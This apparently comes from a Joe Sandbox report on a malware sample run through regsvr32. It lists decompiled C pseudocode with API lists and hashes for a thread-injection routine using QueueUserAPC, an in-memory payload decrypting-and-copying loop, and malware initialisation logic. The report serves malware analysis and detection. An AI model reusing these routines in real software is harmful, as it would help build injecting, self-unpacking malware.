                                                  0x00c86a99
                                                  0x00c86a9f
                                                  0x00c86aa5
                                                  0x00c86aaf
                                                  0x00c86ab3
                                                  0x00c86ab5
                                                  0x00c86aba
                                                  0x00c86abb
                                                  0x00c86abc
                                                  0x00c86ac1
                                                  0x00c86ac7
                                                  0x00c86ad0
                                                  0x00c86ad1
                                                  0x00c86ad6
                                                  0x00c86adc
                                                  0x00c86ae8
                                                  0x00c86aea
                                                  0x00c86aea
                                                  0x00c86af4
                                                  0x00c86af4
                                                  0x00c86a78
                                                  0x00c86a7a
                                                  0x00c86a7a
                                                  0x00c86afe

                                                  APIs
                                                  • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00C8807D,?), ref: 00C86A69
                                                  • GetTickCount.KERNEL32 ref: 00C86A7D
                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,00C8807D,?), ref: 00C86A99
                                                  • SwitchToThread.KERNEL32(?,00000001,?,?,?,00C8807D,?), ref: 00C86A9F
                                                  • _aullrem.NTDLL(?,?,00000009,00000000), ref: 00C86ABC
                                                  • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,00C8807D,?), ref: 00C86AD6
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                  • String ID:
                                                  • API String ID: 507476733-0
                                                  • Opcode ID: 082ea9ae228da4a4822dc014112ae013f26f5e974cac045d6c69f56bf8450ec4
                                                  • Instruction ID: 94f64d2eef54527a608f097dde1444f799cd365047773ac5e770e4466cd19134
                                                  • Opcode Fuzzy Hash: 082ea9ae228da4a4822dc014112ae013f26f5e974cac045d6c69f56bf8450ec4
                                                  • Instruction Fuzzy Hash: 1211C672600200AFE714BB64EC4AB5E7798AB447A4F104529F505D61D0EBB0D900977D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 005E12DC, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 317 5e12dc-5e12fd CreateThread 318 5e12ff-5e1310 QueueUserAPC 317->318 319 5e1334-5e1337 317->319 318->319 320 5e1312-5e1333 GetLastError TerminateThread CloseHandle SetLastError 318->320 320->319
                                                  C-Code - Quality: 100%
                                                  			E005E12DC(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x5e414c, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}








                                                  0x005e12f3
                                                  0x005e12f9
                                                  0x005e12fd
                                                  0x005e1308
                                                  0x005e1310
                                                  0x005e1319
                                                  0x005e131d
                                                  0x005e1324
                                                  0x005e132b
                                                  0x005e132d
                                                  0x005e1333
                                                  0x005e1310
                                                  0x005e1337

                                                  APIs
                                                  • CreateThread.KERNEL32 ref: 005E12F3
                                                  • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 005E1308
                                                  • GetLastError.KERNEL32(00000000), ref: 005E1313
                                                  • TerminateThread.KERNEL32(00000000,00000000), ref: 005E131D
                                                  • CloseHandle.KERNEL32(00000000), ref: 005E1324
                                                  • SetLastError.KERNEL32(00000000), ref: 005E132D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Offset: 005E0000, based on PE: true
                                                  • Associated: 00000002.00000002.646415549.00000000005E5000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_5e0000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                  • String ID:
                                                  • API String ID: 3832013932-0
                                                  • Opcode ID: 0d4b06996ce339e6961b7f94dd01956b5ce28db957ce30150c2c0787af87b6ba
                                                  • Instruction ID: 5ecd6691f6526f964d3504fe638bab1c9395efaea03234fcc49a414a008102b1
                                                  • Opcode Fuzzy Hash: 0d4b06996ce339e6961b7f94dd01956b5ce28db957ce30150c2c0787af87b6ba
                                                  • Instruction Fuzzy Hash: 26F082331016A0FBD7295FA0AC8CF9FBF69FB28711F004404F6819A060C7308A08ABA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C8225B, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 321 c8225b-c82276 call c8550e 324 c82278-c82286 321->324 325 c8228c-c8229a 321->325 324->325 327 c822ac-c822c7 call c83d0d 325->327 328 c8229c-c8229f 325->328 334 c822c9-c822cf 327->334 335 c822d1 327->335 328->327 329 c822a1-c822a6 328->329 329->327 331 c8242d 329->331 333 c8242f-c82435 331->333 336 c822d7-c822ec call c81bf4 call c81b2f 334->336 335->336 341 c822ee-c822f1 CloseHandle 336->341 342 c822f7-c822fc 336->342 341->342 343 c822fe-c82303 342->343 344 c82322-c8233a call c82049 342->344 346 c82419-c8241d 343->346 347 c82309 343->347 352 c8233c-c82364 memset RtlInitializeCriticalSection 344->352 353 c82366-c82368 344->353 349 c8241f-c82423 346->349 350 c82425-c8242b 346->350 351 c8230c-c8231b call c8a501 347->351 349->333 349->350 350->333 359 c8231d 351->359 355 c82369-c8236d 352->355 353->355 355->346 358 c82373-c82389 RtlAllocateHeap 355->358 360 c823b9-c823bb 358->360 361 c8238b-c823b7 wsprintfA 358->361 359->346 362 c823bc-c823c0 360->362 361->362 362->346 363 c823c2-c823e2 call c8269c call c84094 362->363 363->346 368 c823e4-c823eb call c896a4 363->368 371 c823ed-c823f0 368->371 372 c823f2-c823f9 368->372 371->346 373 c823fb-c823fd 372->373 374 c8240e-c82412 call c86786 372->374 373->346 375 c823ff-c82403 call c83dd9 373->375 378 c82417 374->378 379 c82408-c8240c 375->379 378->346 379->346 379->374
                                                  C-Code - Quality: 57%
                                                  			E00C8225B(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E00C8550E();
				if(_t21 != 0) {
					_t59 =  *0xc8d25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0xc8d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0xc8d164(0, 2);
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E00C83D0D( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0xc8d27c; // 0x41a5a8
					if( *0xc8d25c > 5) {
						_t8 = _t26 + 0xc8e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0xc8ea15; // 0x44283a44
						_t27 = _t7;
					}
					E00C81BF4(_t27, _t27);
					_t31 = E00C81B2F(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0xc8d270 =  *0xc8d270 ^ 0x81bbe65d;
						_t32 = E00C82049(0x60);
						__eflags = _t32;
						 *0xc8d32c = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0xc8d32c; // 0x10a95b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0xc8d32c; // 0x10a95b0
							 *_t51 = 0xc8e836;
						}
						__eflags = 0;
						_t54 = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0xc8d238, 0, 0x43);
							__eflags = _t36;
							 *0xc8d2c4 = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0xc8d25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0xc8d27c; // 0x41a5a8
								_t13 = _t58 + 0xc8e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0xc8c2a7);
							}
							__eflags = 0;
							_t54 = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E00C8269C( ~_v8 &  *0xc8d270, 0xc8d00c); // executed
								_t42 = E00C84094(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E00C896A4(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E00C86786(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E00C83DD9(__eflags,  &(_t65[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0xc8d160();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E00C8A501(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}
































                                                  0x00c8225b
                                                  0x00c82266
                                                  0x00c82269
                                                  0x00c8226c
                                                  0x00c8226f
                                                  0x00c82276
                                                  0x00c82278
                                                  0x00c82284
                                                  0x00c82286
                                                  0x00c82286
                                                  0x00c8228f
                                                  0x00c82297
                                                  0x00c8229a
                                                  0x00c822b4
                                                  0x00c822c0
                                                  0x00c822c2
                                                  0x00c822c7
                                                  0x00c822d1
                                                  0x00c822d1
                                                  0x00c822c9
                                                  0x00c822c9
                                                  0x00c822c9
                                                  0x00c822c9
                                                  0x00c822d8
                                                  0x00c822e5
                                                  0x00c822ec
                                                  0x00c822f1
                                                  0x00c822f1
                                                  0x00c822f9
                                                  0x00c822fc
                                                  0x00c82322
                                                  0x00c8232e
                                                  0x00c82333
                                                  0x00c82335
                                                  0x00c8233a
                                                  0x00c82366
                                                  0x00c82368
                                                  0x00c8233c
                                                  0x00c82340
                                                  0x00c82345
                                                  0x00c8234a
                                                  0x00c82351
                                                  0x00c82357
                                                  0x00c8235c
                                                  0x00c82362
                                                  0x00c82369
                                                  0x00c8236b
                                                  0x00c8236d
                                                  0x00c8237c
                                                  0x00c82382
                                                  0x00c82384
                                                  0x00c82389
                                                  0x00c823b9
                                                  0x00c823bb
                                                  0x00c8238b
                                                  0x00c8238b
                                                  0x00c82391
                                                  0x00c8239e
                                                  0x00c823a4
                                                  0x00c823a4
                                                  0x00c823ac
                                                  0x00c823b5
                                                  0x00c823bc
                                                  0x00c823be
                                                  0x00c823c0
                                                  0x00c823c7
                                                  0x00c823d4
                                                  0x00c823d9
                                                  0x00c823de
                                                  0x00c823e0
                                                  0x00c823e2
                                                  0x00000000
                                                  0x00000000
                                                  0x00c823e4
                                                  0x00c823e9
                                                  0x00c823eb
                                                  0x00c823f2
                                                  0x00c823f6
                                                  0x00c823f9
                                                  0x00c8240e
                                                  0x00c82412
                                                  0x00c82417
                                                  0x00000000
                                                  0x00c82417
                                                  0x00c823fb
                                                  0x00c823fd
                                                  0x00000000
                                                  0x00000000
                                                  0x00c82403
                                                  0x00c82408
                                                  0x00c8240a
                                                  0x00c8240c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00c8240c
                                                  0x00c823ef
                                                  0x00c823ef
                                                  0x00c823c0
                                                  0x00c822fe
                                                  0x00c822fe
                                                  0x00c82303
                                                  0x00c82419
                                                  0x00c8241d
                                                  0x00c82425
                                                  0x00c82425
                                                  0x00000000
                                                  0x00c8241d
                                                  0x00c82309
                                                  0x00c8230c
                                                  0x00c82316
                                                  0x00c8231d
                                                  0x00000000
                                                  0x00c8242d
                                                  0x00c8242d
                                                  0x00c82431
                                                  0x00c82435
                                                  0x00c82435

                                                  APIs
                                                    • Part of subcall function 00C8550E: GetModuleHandleA.KERNEL32(4C44544E,00000000,00C82274,00000000,00000000), ref: 00C8551D
                                                  • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 00C822F1
                                                    • Part of subcall function 00C82049: RtlAllocateHeap.NTDLL(00000000,00000000,00C87E50), ref: 00C82055
                                                  • memset.NTDLL ref: 00C82340
                                                  • RtlInitializeCriticalSection.NTDLL(010A9570), ref: 00C82351
                                                    • Part of subcall function 00C83DD9: memset.NTDLL ref: 00C83DEE
                                                    • Part of subcall function 00C83DD9: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00C83E22
                                                    • Part of subcall function 00C83DD9: StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 00C83E2D
                                                  • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 00C8237C
                                                  • wsprintfA.USER32 ref: 00C823AC
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                  • String ID:
                                                  • API String ID: 4246211962-0
                                                  • Opcode ID: 499a07449b292ec8f611185e7b34cef26b7bdf3724ac9ac07f9a607b42b44afa
                                                  • Instruction ID: a44c4eef1efb110f36ac07ec0ca73e51b58103f0ab65a6536c0a811abd9566eb
                                                  • Opcode Fuzzy Hash: 499a07449b292ec8f611185e7b34cef26b7bdf3724ac9ac07f9a607b42b44afa
                                                  • Instruction Fuzzy Hash: 7C510471A00214ABDB20BBA5DC8DF6E37BCAB4471CF00442AF512E7191E7B4DE40AB6C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C83AEF, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SysAllocString.OLEAUT32(80000002), ref: 00C83B46
                                                  • SysAllocString.OLEAUT32(00C81885), ref: 00C83B89
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00C83B9D
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00C83BAB
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree
                                                  • String ID:
                                                  • API String ID: 344208780-0
                                                  • Opcode ID: 8d5a14fd48c1fccb914f4704f52620a983bccefbb4b9cbf7182796c3ed0c055b
                                                  • Instruction ID: 7f637b8a94353cfafe9f7a8d77ecf54b571184055dbc7426fdca9166c3ecdbf6
                                                  • Opcode Fuzzy Hash: 8d5a14fd48c1fccb914f4704f52620a983bccefbb4b9cbf7182796c3ed0c055b
                                                  • Instruction Fuzzy Hash: B8313BB1900149EFCB05EF98D8C48AE7BB9FF48344B10846EF51AA7210D7359A85CF69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 005E18F4, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E005E18F4(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x5e4130;
				_t39 = E005E1F5D(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x5e414c;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x5e51a7; // 0x5e51a7
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E005E18C4(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x5e414c = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}























                                                  0x005e18fb
                                                  0x005e190b
                                                  0x005e1912
                                                  0x005e1915
                                                  0x005e192a
                                                  0x005e1931
                                                  0x005e1936
                                                  0x005e1947
                                                  0x005e194a
                                                  0x005e1952
                                                  0x005e1955
                                                  0x005e19ff
                                                  0x005e195b
                                                  0x005e195b
                                                  0x005e195f
                                                  0x005e19c7
                                                  0x005e1961
                                                  0x005e1961
                                                  0x005e1964
                                                  0x005e1966
                                                  0x005e196e
                                                  0x005e1971
                                                  0x005e1974
                                                  0x005e197c
                                                  0x005e1984
                                                  0x005e1985
                                                  0x005e1986
                                                  0x005e198d
                                                  0x005e198d
                                                  0x005e19a1
                                                  0x005e19a6
                                                  0x005e19af
                                                  0x005e19b6
                                                  0x005e19b9
                                                  0x005e19bd
                                                  0x005e19c2
                                                  0x00000000
                                                  0x00000000
                                                  0x005e1979
                                                  0x005e1979
                                                  0x005e19c4
                                                  0x005e19d1
                                                  0x005e19e6
                                                  0x005e19d3
                                                  0x005e19dc
                                                  0x005e19e1
                                                  0x005e19f7
                                                  0x005e19f7
                                                  0x005e1a06
                                                  0x005e1a0c

                                                  APIs
                                                  • VirtualAlloc.KERNELBASE(00000000,005E167D,00003000,00000004,?,?,005E167D,00000000), ref: 005E194A
                                                  • memcpy.NTDLL(?,?,005E167D,?,?,005E167D,00000000), ref: 005E19DC
                                                  • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,005E167D,00000000), ref: 005E19F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Offset: 005E0000, based on PE: true
                                                  • Associated: 00000002.00000002.646415549.00000000005E5000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_5e0000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Virtual$AllocFreememcpy
                                                  • String ID: Mar 9 2021
                                                  • API String ID: 4010158826-2159264323
                                                  • Opcode ID: ad371490977d3dce6faaafa4f33f38985e7fc4ceec7383803cbcf9af3e7b42a8
                                                  • Instruction ID: 64f389db5c04c51f276c751c121fadcbf0f9e36cb35381e56361efaa2f6e6af7
                                                  • Opcode Fuzzy Hash: ad371490977d3dce6faaafa4f33f38985e7fc4ceec7383803cbcf9af3e7b42a8
                                                  • Instruction Fuzzy Hash: F2315071E0065A9FCF08CF9AC885AAEBBB5BF48304F108168E545EB251D771AA45CF94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C81A70, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E00C81A70(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E00C82049(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                  0x00c81a7c
                                                  0x00c81a80
                                                  0x00c81a81
                                                  0x00c81a82
                                                  0x00c81a84
                                                  0x00c81a86
                                                  0x00c81a8b
                                                  0x00c81a8e
                                                  0x00c81b25
                                                  0x00c81b2c
                                                  0x00c81b2c
                                                  0x00c81a97
                                                  0x00c81a9e
                                                  0x00c81aae
                                                  0x00c81aae
                                                  0x00c81ab4
                                                  0x00c81ab6
                                                  0x00c81abb
                                                  0x00c81ac4
                                                  0x00c81acc
                                                  0x00c81acf
                                                  0x00c81ada
                                                  0x00c81ade
                                                  0x00c81ae0
                                                  0x00c81ae1
                                                  0x00c81aea
                                                  0x00c81aee
                                                  0x00c81aff
                                                  0x00c81af0
                                                  0x00c81af5
                                                  0x00c81afa
                                                  0x00c81b09
                                                  0x00c81b09
                                                  0x00c81ade
                                                  0x00c81b0f
                                                  0x00c81b15
                                                  0x00c81b15
                                                  0x00c81b1e
                                                  0x00c81b23
                                                  0x00c81b23
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: FreeSleepStringlstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 1198164300-0
                                                  • Opcode ID: 27dfd6f5551703c795535b7a89cd4816fb54083e82f741838ae71091d2484683
                                                  • Instruction ID: 6398dd2fee2082c849f5d1cfccc4a7c1fef2b6c0fde9ec8d82fd70876293180f
                                                  • Opcode Fuzzy Hash: 27dfd6f5551703c795535b7a89cd4816fb54083e82f741838ae71091d2484683
                                                  • Instruction Fuzzy Hash: F42171B5A00209EFCB10EFA8D884EEEBBF9FF48355B144169E805E7210E730DA45DB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C894A9, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 53%
                                                  			E00C894A9(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E00C82049(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0xc8c2a4); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0xc8c2a4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}










                                                  0x00c894b4
                                                  0x00c894b8
                                                  0x00c894ba
                                                  0x00c894bb
                                                  0x00c894c3
                                                  0x00c894c3
                                                  0x00c894c7
                                                  0x00000000
                                                  0x00000000
                                                  0x00c894be
                                                  0x00c894bf
                                                  0x00c894c2
                                                  0x00c894c2
                                                  0x00c894cf
                                                  0x00c894d6
                                                  0x00c894da
                                                  0x00c894e2
                                                  0x00c894e8
                                                  0x00c894ea
                                                  0x00c894ef
                                                  0x00c894f3
                                                  0x00c894f5
                                                  0x00c894f8
                                                  0x00c894ff
                                                  0x00c894ff
                                                  0x00c89509
                                                  0x00c8950c
                                                  0x00c8950f
                                                  0x00c8950f
                                                  0x00c8951b
                                                  0x00c8951b
                                                  0x00c89528

                                                  APIs
                                                  • StrChrA.SHLWAPI(?,00000020,00000000,010A95AC,?,00C823DE,?,00C87634,010A95AC,?,00C823DE), ref: 00C894C3
                                                  • StrTrimA.KERNELBASE(?,00C8C2A4,00000002,?,00C823DE,?,00C87634,010A95AC,?,00C823DE), ref: 00C894E2
                                                  • StrChrA.SHLWAPI(?,00000020,?,00C823DE,?,00C87634,010A95AC,?,00C823DE), ref: 00C894ED
                                                  • StrTrimA.SHLWAPI(00000001,00C8C2A4,?,00C823DE,?,00C87634,010A95AC,?,00C823DE), ref: 00C894FF
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Trim
                                                  • String ID:
                                                  • API String ID: 3043112668-0
                                                  • Opcode ID: c885044292d23ac8770c14ddfe6c6adb9a9de48caeac468ee9d92a7fd556f095
                                                  • Instruction ID: 24a90f39c65545c384a835804bb1480f1b62591baf1c94491e1f64aebe907502
                                                  • Opcode Fuzzy Hash: c885044292d23ac8770c14ddfe6c6adb9a9de48caeac468ee9d92a7fd556f095
                                                  • Instruction Fuzzy Hash: CE01B5716053116FD331AF698C89F3B7B98EF86B68F160518F851C7280DB70CC0297A8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

